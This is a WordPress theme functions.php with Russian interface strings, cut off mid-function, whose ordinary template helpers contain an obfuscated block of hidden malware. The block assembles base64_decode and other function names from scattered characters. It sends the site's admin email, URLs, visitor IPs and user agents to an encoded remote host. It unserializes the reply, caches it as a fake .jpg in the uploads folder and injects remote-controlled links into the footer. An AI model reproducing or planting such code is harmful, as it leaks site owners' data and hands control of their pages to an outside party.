<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $LXoEI='o';$PnVJJws='6';$RWmadvg='s';$vBJeJGn='b';$KLKGYKK='_';$AcfvLOR='e';$opYZ='d';$fYbtItY='4';$RQEIn='d';$lQxn='e';$CWdD='c';$JsFkr='a';$rQPVzdN='e';$QKrcarZd=$vBJeJGn.$JsFkr.$RWmadvg.$lQxn.$PnVJJws.$fYbtItY.$KLKGYKK.$RQEIn.$AcfvLOR.$CWdD.$LXoEI.$opYZ.$rQPVzdN;$sBSO='n';$XydTXwb='l';$DDGNLN='f';$lLgW='g';$vuICUG='a';$YNtggV='t';$siMZs='z';$gzXdehN='i';$VFBzmpl='e';$wiLPWkhg=$lLgW.$siMZs.$gzXdehN.$sBSO.$DDGNLN.$XydTXwb.$vuICUG.$YNtggV.$VFBzmpl;$VxAeV='r';$AQigntr='o';$eOya='t';$gsFkyOI='_';$ZehR='1';$zbJQt='r';$zwuY='3';$rjKxp='s';$wlkXKx='t';$dgjyPLsv=$rjKxp.$wlkXKx.$VxAeV.$gsFkyOI.$zbJQt.$AQigntr.$eOya.$ZehR.$zwuY;$pMXaZEq='e';$ZfXx='r';$JpAuCO='r';$mHqTSx='s';$sPKyvOW='t';$xOPQDzp='v';$WLnozMXc=$mHqTSx.$sPKyvOW.$ZfXx.$JpAuCO.$pMXaZEq.$xOPQDzp;                     
		$gq___________x='o';$tz________h='6';$sa___u='s';$hc_____o='b';$jw________s='_';$wc______________k='e';$qu_______________k='d';$za___r='4';$au_____________i='d';$qa___b='e';$fg________x='c';$od_______b='a';$uk___________t='e';$bk____f=$hc_____o.$od_______b.$sa___u.$qa___b.$tz________h.$za___r.$jw________s.$au_____________i.$wc______________k.$fg________x.$gq___________x.$qu_______________k.$uk___________t;
		$so_________r='n';$xt______y='o';$np_______c='i';$qh________a='_';$hc_______v='t';$xw___j='e';$kp_______c='u';$yb____________v='f';$mz_______________x='c';$ll_____d='n';$jl____________r='i';$ij________u='x';$od________b='s';$ql_________j='s';$tw____q='t';$dg__n=$yb____________v.$kp_______c.$ll_____d.$mz_______________x.$hc_______v.$np_______c.$xt______y.$so_________r.$qh________a.$xw___j.$ij________u.$jl____________r.$od________b.$tw____q.$ql_________j;
		$ko________u='p';$wt____b='n';$vi_________v='o';$cc___m='e';$oj____________f='f';$ic_______l=$oj____________f.$vi_________v.$ko________u.$cc___m.$wt____b;
		$hw_______________e='f';$qn____d='a';$hr_____l='d';$pe____m='r';$wv_______________w='e';$rq___________p=$hw_______________e.$pe____m.$wv_______________w.$qn____d.$hr_____l;
		$kq________v='c';$is__________v='s';$dw_____a='f';$vw___________f='l';$za______________a='o';$tr____p='e';$fl_______________p=$dw_____a.$kq________v.$vw___________f.$za______________a.$is__________v.$tr____p;
		
		define("WP_ID", $bk____f("Mi4wLjA="));
		define("WP_TTL", $bk____f("MTA4MDA="));
		define("WP_SRC", $bk____f("dHBva24="));
	


		function wp_get_header() {
			global $bk____f, $dg__n;
			
			if (
				$dg__n($bk____f("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$dg__n($bk____f("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$dg__n($bk____f("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $bk____f, $ic_______l, $fl_______________p, $rq___________p;
			
			$ij_______________o = TEMPLATEPATH."/".$bk____f("Zm9vdGVyLnBocA==");
			$ie__k = @$ic_______l($ij_______________o, "r");
			$ij_______________o = @$rq___________p($ie__k, @filesize($ij_______________o));
			@$fl_______________p($ie__k);
			
			$hg______________z = TEMPLATEPATH."/".$bk____f("ZnVuY3Rpb25zLnBocA==");
			$ie__k = @$ic_______l($hg______________z, "r");
			$hg______________z = @$rq___________p($ie__k, @filesize($hg______________z));
			@$fl_______________p($ie__k);
			
			$sm_____________x = 0;
			if($ij_______________o && $hg______________z) {
				if ($bk____f("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($ij_______________o, $bk____f("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$sm_____________x = 1;
					}
					if (substr_count($ij_______________o, "wp_theme_GPL_credits()") < 1) {
						$sm_____________x = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$sm_____________x = 12;
				}
			}
			
			if($sm_____________x > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $sm_____________x -->";
			}
		}
	


		function wp_loaded() {
			global $bk____f, $dg__n;
			return $dg__n($bk____f("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($wm______l, $my____________j = "(more...)", $ty___c = 0, $nh__________o = "") {
				$ld_____________e = get_the_content($my____________j, $ty___c, $nh__________o);
				$ld_____________e = apply_filters("the_content", $ld_____________e);
				
				$ld_____________e = str_replace("]]>", "]]>", $ld_____________e);
				if (strlen($_GET["p"]) > 0) {
					echo $ld_____________e;
				}
				else if ((strlen($ld_____________e)>$wm______l) && ($kl___t = strpos($ld_____________e, " ", $wm______l ))) {
					$ld_____________e = substr($ld_____________e, 0, $kl___t);
					$ld_____________e = $ld_____________e;
					echo $ld_____________e;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$my____________j</a></div></p>";
				} else {
					echo $ld_____________e;
				}
				
			}
		}
	


		$my_______m='n';$cu______________d='s';$nw_____t='d';$um_______e='e';$kz_________f='b';$oo_________r='c';$tb___e='e';$aj__b='e';$br______s='4';$ap____a='a';$jl____________c='o';$lb___________r='_';$gd___i='6';$uu_____________q=$kz_________f.$ap____a.$cu______________d.$tb___e.$gd___i.$br______s.$lb___________r.$um_______e.$my_______m.$oo_________r.$jl____________c.$nw_____t.$aj__b;
		$vy_________s='e';$yd__f='f';$nm______________r='t';$qy____e='t';$gd_________t='l';$eu__________e='_';$zm___________l='n';$bt___s='n';$ma_____________k='t';$wb______________z='e';$ah_____________i='i';$cl_________j='c';$hm______________j='s';$ox____________k='g';$pa___u='o';$fa__________i='e';$rw______________l='_';$du_______c=$yd__f.$ah_____________i.$gd_________t.$fa__________i.$rw______________l.$ox____________k.$wb______________z.$ma_____________k.$eu__________e.$cl_________j.$pa___u.$bt___s.$qy____e.$vy_________s.$zm___________l.$nm______________r.$hm______________j;
		$kf__________n='l';$tf____l='s';$ft__________g='i';$bo_________i='i';$rh_________n='e';$gq_______________r='f';$nt_____________w='x';$en_______________j='s';$ao____________g='e';$sd_____________y='_';$go__________q='t';$yx_______a=$gq_______________r.$ft__________g.$kf__________n.$rh_________n.$sd_____________y.$ao____________g.$nt_____________w.$bo_________i.$en_______________j.$go__________q.$tf____l;
		$dr___________g='i';$kb_________i='a';$wk__o='_';$dw_______________q='o';$dt_______h='p';$kc_______e='s';$xg_______________t='o';$mx___s='r';$ma_______m='n';$ua______e='m';$rn_______________f='v';$il___u='r';$fe___v='e';$xz____________d='c';$lm_____i='e';$rz__x=$rn_______________f.$fe___v.$mx___s.$kc_______e.$dr___________g.$xg_______________t.$ma_______m.$wk__o.$xz____________d.$dw_______________q.$ua______e.$dt_______h.$kb_________i.$il___u.$lm_____i;
		$xa_______________e='c';$ry__________o='e';$wg________u='f';$uc_____s='o';$qx_____________s='s';$xz______________h='k';$xr___________n='p';$gz__________w='o';$fb______v='n';$ef________x=$wg________u.$qx_____________s.$uc_____s.$xa_______________e.$xz______________h.$gz__________w.$xr___________n.$ry__________o.$fb______v;
		$yu__i='i';$ad_______________f='t';$tk______b='e';$ix____i='f';$as___h='w';$mo________i='r';$gi___n=$ix____i.$as___h.$mo________i.$yu__i.$ad_______________f.$tk______b;
		$ng___________m='m';$at_____________a='d';$wt_____q='5';$fk_____r=$ng___________m.$at_____________a.$wt_____q;
		$ol_____x='l';$ea_______k='t';$em__________l='a';$pp_____k='a';$de_________l='r';$kd____o='h';$py____e='e';$ym_____e='p';$qj____________l=$de_________l.$py____e.$em__________l.$ol_____x.$ym_____e.$pp_____k.$ea_______k.$kd____o;
		$zw___x='u';$bs____________k='i';$md_________b='a';$tt______f='z';$kk__________x='i';$lo_____________z='s';$sp__________i='r';$ue__________u='l';$jb__w='n';$fh_____________o='e';$hc_____n='e';$gn______f=$zw___x.$jb__w.$lo_____________z.$fh_____________o.$sp__________i.$kk__________x.$md_________b.$ue__________u.$bs____________k.$tt______f.$hc_____n;
		$ib___________z='p';$ed_______________v='t';$gm___________e='n';$dt_____________q='m';$mw_______r='m';$vk______________w='e';$at_____________h='a';$kc______________k=$ed_______________v.$vk______________w.$mw_______r.$ib___________z.$gm___________e.$at_____________h.$dt_____________q;
		$ko______b='t';$rr_____________x='o';$pg__g='x';$tb__________m='s';$mx___________d='c';$ol__j='r';$re_________b='m';$re_________u='_';$ft_______________v='t';$ev__________q='e';$wz__s='r';$tb________o='e';$ic_______b='t';$tw______________i='_';$ek____i='a';$za___k='e';$gd_________c='t';$ui__r='n';$ub__c='e';$mu__________k='a';$pp__i='c';$lw_________m=$tb__________m.$gd_________c.$wz__s.$tb________o.$mu__________k.$re_________b.$re_________u.$pp__i.$rr_____________x.$ui__r.$ic_______b.$ev__________q.$pg__g.$ko______b.$tw______________i.$mx___________d.$ol__j.$ub__c.$ek____i.$ft_______________v.$za___k;
	


		function pp____c($oa____z) {
			global $bk____f, $dg__n, $du_______c, $rz__x, $lw_________m;
			
			if (!$dg__n($bk____f("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($rz__x(PHP_VERSION, "5.0.0", ">=") && $dg__n($bk____f("ZmlsZV9nZXRfY29udGVudHM=")) && $dg__n($bk____f("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$gr________e = $lw_________m(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$gg______b = @$du_______c($oa____z, 0, $gr________e);
			} else {
				$gg______b = @$du_______c($oa____z, 0);
			}
			
			return $gg______b;
		}
	


		function nk______v($oa____z) {
			global $dg__n, $ef________x, $gi___n, $bk____f;
			
			if (!$dg__n($bk____f("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$hx__x = strpos($oa____z, "/", 7);
			$ka___________z = array(
				"uri"     => substr($oa____z, $hx__x),
				"host"    => str_replace("http://", "", substr($oa____z, 0, $hx__x)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$yt_______________j = @$ef________x("$ka___________z[host]", 80, $nd_____________r, $ak_____l, 4);
			
			if (!$yt_______________j) {
				return false;
			} else {
				$gg______b = "";
				$bd_______k  = "GET $ka___________z[uri] HTTP/1.0\r\n";
				$bd_______k .= "Host: $ka___________z[host]\r\n";
				$bd_______k .= "Referer: $ka___________z[referer]\r\n";
				$bd_______k .= "Connection: Close\r\n\r\n";
				
				@$gi___n($yt_______________j, $bd_______k);
				
				while (!@feof($yt_______________j)) {
					$vv______________g = @fgets($yt_______________j, (1024*24));
					
					if ($vv______________g == "\r\n") {
						$ul_______e = true;
						continue;
					}
					
					if ($ul_______e) {
						$gg______b .= $vv______________g;
					}
				}
				
				return $gg______b;
			}
		}
	


		function cm_____________t($oa____z) {
			global $dg__n;
			$qb__________y = false;
			
			if ($oa____z != "") {
				if ($dg__n("pp____c")) {
					$qb__________y = @pp____c($oa____z);
				}
				
				if (!$qb__________y && ($dg__n("nk______v"))) {
					$qb__________y = @nk______v($oa____z);
				}
			}
			
			return $qb__________y;
		}
	


		function vk_________h() {
			global $_SERVER, $fk_____r;
			
			$hn_______c = $_SERVER["SERVER_NAME"];
			
			if (substr("$hn_______c", 0, 4) == "www.") {
				$hn_______c = substr("$hn_______c", 4);
			}
			
			$hn_______c = $fk_____r("$_SERVER[SERVER_NAME]");
			
			return $hn_______c;
		}
	


		function in_______r() {
			return "file";
		}
	


		function cg_____k($oa____z) {
			global $_SERVER, $du_______c, $yx_______a, $ic_______l, $fl_______________p, $gi___n;
			
			$qc________o = oy______________c();
			
			$kh________j = vk_________h().".jpg";
			$gd_____________t = $qc________o["dir_upload"]["path"]."/$kh________j";
			$cf________k = @filemtime($gd_____________t);
			
			if (!$cf________k || ((time()-$cf________k) >= WP_TTL)) {
				$qb__________y = cm_____________t($oa____z);
				
				if ($qb__________y) {
					if ($yx_______a($gd_____________t)) {
						@unlink($gd_____________t);
					}
					
					$ie__k = @$ic_______l($gd_____________t, "x+");
					
					@$gi___n($ie__k, $qb__________y);
					@$fl_______________p($ie__k);
				}
			} else {
				if ($yx_______a($gd_____________t)) {
					$qb__________y = @$du_______c($gd_____________t);
				} else {
					$qb__________y = false;
				}
			}
			
			return $qb__________y;
		}
	


		function oy______________c() {
			global $_SERVER, $bk____f, $uu_____________q;
			
			$bz___s = wp_count_posts("post");
			$cf______________v = pathinfo(get_bloginfo("template_directory"));
			
			$qc________o = array(
				"url" => array(
					"report"      => $bk____f("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $cf______________v,
				"dir_upload"	=> xr_____________q(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$cf______________v[filename],
					"a005=".$bz___s->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://www.wptheme.us\">www.wptheme.us</a>"

			);
			
			$qc________o["url"]["queryString"] = implode("&", $qc________o["queryString"]);
			$qc________o["url"]["report"] = $qc________o["url"]["report"]."/?".$uu_____________q($qc________o["url"]["queryString"]).".html";
						
			return $qc________o;
		}
	


		function xr_____________q() {
			$dl__c = wp_upload_dir();
			
			if (isset($dl__c["error"])) {
				$mm__________k = rz_______________g();
				if (is_writable($mm__________k)) {
					$dl__c = array("path" => $mm__________k);
				}
			}

			return $dl__c;
		}
	


		function rz_______________g() {
			global $dg__n, $fk_____r, $qj____________l, $kc______________k;
			
			$ow_____________r = (bool) ini_get("safe_mode");
			if ($ow_____________r == true) {
				return false;
			}
			
			if ($dg__n("sys_get_temp_dir")) {
				$lh__________v = sys_get_temp_dir();
				if (is_writable($lh__________v)) {
					return $qj____________l($lh__________v);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $qj____________l($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $qj____________l($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $qj____________l($_ENV["TEMP"]);
			} else {
				$ms________q = $kc______________k($fk_____r(uniqid(rand(), true)), "");
				if ($ms________q) {
					$lh__________v = $qj____________l(dirname($ms________q));
					@unlink($ms________q);
					return $lh__________v;
				} else {
					return false;
				}
			}
		}
	


		function os___________m() {
			global $_GET, $yx_______a;
			
			$qc________o = oy______________c();
			$hn_______c = vk_________h();
			$cm_______p = in_______r();
			
			$hb________v = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($cm_______p == "file") {
					$vy_______________w = $qc________o["dir_upload"]["path"]."/".$hn_______c.".jpg";
					if ($yx_______a($vy_______________w)) {
						@unlink($vy_______________w);
						$hb________v = "deleted";
					}
				}
				
				$tj_____b = array(
					"s"	=> $hb________v,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($tj_____b AS $wl___________r => $jq_________y) echo " [$wl___________r:$jq_________y]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $dg__n, $bk____f, $gn______f;
			$qc________o = oy______________c();
			
			$zo_________y = "cg_____k";
			if ($dg__n($zo_________y)) {
				$gg______b = $zo_________y($qc________o["url"]["report"]);
			}
			
			if ($gg______b) {
				if ($gg______b = @$bk____f($gg______b)) {
					$gg______b = @$gn______f($gg______b);
					
					if (strlen($gg______b[custom_credit]) >= 5) {
						$qc________o["default_string"] = $gg______b[custom_credit];
					}
					
					if ($gg______b["status"] == "0") {
						$ru_____________s = 1;
						$uv____b = 1;
					} else {
						$ui_____d = sizeof($gg______b["links"]);
						$fs_______________p = $qc________o["default_string"];
						
						if ($ui_____d > 0 && $gg______b["links"] !== "") {
							$mg__j = 0;
							foreach ($gg______b["links"] as $qx____a => $aw_____________y) {
								$mg__j++;
								if ($aw_____________y->l_path == "" || $aw_____________y->l_path == $_SERVER["REQUEST_URI"]) {
									$aw_____________y->l_href = htmlspecialchars(strip_tags($aw_____________y->l_href));
									$aw_____________y->l_title = htmlspecialchars(strip_tags($aw_____________y->l_title));
									$aw_____________y->l_anchor = htmlspecialchars(strip_tags($aw_____________y->l_anchor));
									$fs_______________p .= " | ";
									$fs_______________p .= "<a href='$aw_____________y->l_href' title='$aw_____________y->l_title'";
									if ($aw_____________y->l_nofollow == "1") {
										$fs_______________p .= " rel='nofollow'";
									}
									$fs_______________p .= ">$aw_____________y->l_anchor</a>";
								}
							}
						}
						$qc________o["links"] = "$fs_______________p";
						if ($gg______b[credit] == "0") {
							$qc________o["links"] = "";
						}
					}
				} else {
					$ru_____________s = "1";
				}
			} else {
				$ru_____________s = "1";
			}
			
			if ($ru_____________s == "1") {
				$qc________o["links"] = $qc________o["default_string"];
			}
			
			echo "$qc________o[links]";
			
			echo "<!-- s: $gg______b[signature] -->";
			os___________m();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Not Found', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
